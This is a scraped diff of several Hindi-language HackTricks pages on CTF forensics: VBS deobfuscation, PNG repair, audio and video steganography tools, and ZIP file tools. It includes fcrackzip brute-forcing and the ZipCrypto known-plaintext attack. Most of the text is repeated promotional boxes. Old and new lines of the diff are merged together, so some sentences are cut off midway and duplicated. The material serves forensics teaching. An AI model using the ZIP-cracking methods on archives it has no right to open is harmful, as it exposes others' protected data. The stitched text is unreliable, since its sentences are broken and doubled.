* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं: कुछ चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं:
## echo ## echo
```bash ```bash
@ -52,16 +53,17 @@ End With
End Function End Function
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** PRs को **HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,33 +1,35 @@
<details> {% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> **GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>
**PNG फ़ाइलें** **CTF challenges** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिससे वे छिपी हुई डेटा को एम्बेड करने के लिए आदर्श होती हैं। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छिपे हुए जानकारी या असमान्यताएँ प्रकट करते हैं।
PNG फ़ाइल की अखंडता की जाँच और क्षति को ठीक करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएँ एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNGs को मरम्मत करने** में, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छिपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्त करने में मदद करती हैं।
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 **शामिल हों** [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को [**पीआर जमा करके**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
**PNG फ़ाइलें** **CTF चैलेंज** में अपने **लॉसलेस कंप्रेशन** के लिए प्रशंसित हैं, जिन्हें छुपी डेटा को एम्बेड करने के लिए आदर्श बनाता है। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा को विश्लेषित करके, छुपे जानकारी या विसंगतियों को प्रकट करते हैं।
PNG फ़ाइल की अखंडता की जाँच करने और क्षति को मरम्मत करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड-लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएं एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNG की मरम्मत के लिए**, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छुपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्ति करने में मदद करती हैं।
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 **शामिल हों** [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को [**पीआर जमा करके**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
{% endhint %}

View file

@ -1,40 +1,14 @@
<details> {% hint style="success" %}
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** एक महत्वपूर्ण तकनीक है **CTF फोरेंसिक्स चैलेंजेस** में, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग करके गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं।
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> ऑडियो चैलेंज के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण करने के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गाने को धीमा करना या उलटा करना छिपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
HackTricks का समर्थन करने के अन्य तरीके: **लीस्ट सिग्निफिकेंट बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग करके डेटा को गुप्त रूप से समाहित करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! वीडियो चैलेंज अक्सर ऑडियो और वीडियो स्ट्रीम्स को बंडल करने वाले कंटेनर फ़ॉर्मेट्स को शामिल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेट्स का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को दर्शाता है, जहां प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा को खोलने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक महत्वपूर्ण तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं। ## संदर्भ
ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गानों को धीमा करना या उलटना छुपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
**कम सार्वजनिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग गुप्त रूप से डेटा समाहित करने के लिए करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
वीडियो चैलेंज अक्सर कंटेनर फ़ॉर्मेट का सामाग्री जोड़ने वाले होते हैं जो ऑडियो और वीडियो स्ट्रीम्स को बंडल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेटों का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को प्रकट करता है, जहाँ प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा का पता लगाने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
# संदर्भ
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
{% endhint %}
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -1,27 +1,46 @@
# ZIPs tricks # ZIPs ट्रिक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
**कमांड लाइन उपकरण** जो **ज़िप फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं जो ज़िप फ़ाइलें निदान, मरम्मत और क्रैकिंग के लिए हैं। यहाँ कुछ मुख्य उपयोगी उपकरण हैं: **कमांड-लाइन टूल्स** जो **zip फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं, zip फ़ाइलें का निदान करने, मरम्मत करने, और क्रैक करने के लिए। यहाँ कुछ मुख्य उपयोगी उपकरण हैं:
- **`unzip`**: बताता है कि ज़िप फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है। - **`unzip`**: बताता है कि एक zip फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है।
- **`zipdetails -v`**: ज़िप फ़ाइल प्रारूप क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है। - **`zipdetails -v`**: zip फ़ाइल प्रारूप के क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है।
- **`zipinfo`**: ज़िप फ़ाइल की सामग्री की सूची बनाता है बिना उन्हें निकाले - **`zipinfo`**: उन्हें निकाले बिना zip फ़ाइल की सामग्री की सूची देता है
- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त ज़िप फ़ाइलों को मरम्मत करने की कोशिश करें। - **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त zip फ़ाइलों को मरम्मत करने का प्रयास करें।
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: ज़िप पासवर्ड की ब्रूट-फोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है। - **[fcrackzip](https://github.com/hyc/fcrackzip)**: zip पासवर्ड का ब्रूट-फ़ोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है।
[ज़िप फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) ज़िप फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है। [Zip फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) zip फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है।
महत्वपूर्ण नोट: पासवर्ड से सुरक्षित ज़िप फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार नहीं एन्क्रिप्ट** करती हैं, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करती हैं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई ज़िप फ़ाइलें एक **प्लेनटेक्स्ट हमले** के लिए संवेदनशील हैं यदि किसी अनएन्क्रिप्टेड कॉपी की उपलब्ध है। एक उपलब्ध फ़ाइल का ज्ञात सामग्री का उपयोग करके ज़िप का पासवर्ड क्रैक करने के लिए यह हमला किया जा सकता है, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई ज़िप फ़ाइलें इस प्लेनटेक्स्ट हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विध महत्वपूर्ण है कि पासवर्ड से सुरक्षित zip फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार एन्क्रिप्ट नहीं करतीं**, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करतीं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई zip फ़ाइलें एक **सादाक्षर हमले** के लिए विकल्पशील हैं अगर किसी अनएन्क्रिप्टेड कॉपी की एक कम्प्रेस्ड फ़ाइल उपलब्ध है। यह हमला जानी गई सामग्री का उपयोग करता है ताकि zip का पासवर्ड क्रैक किया जा सके, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई zip फ़ाइलें इस सादाक्षर हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विधियों का चयन करने की महत्वता को प्रदर्शित करती है।
## संदर्भ
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
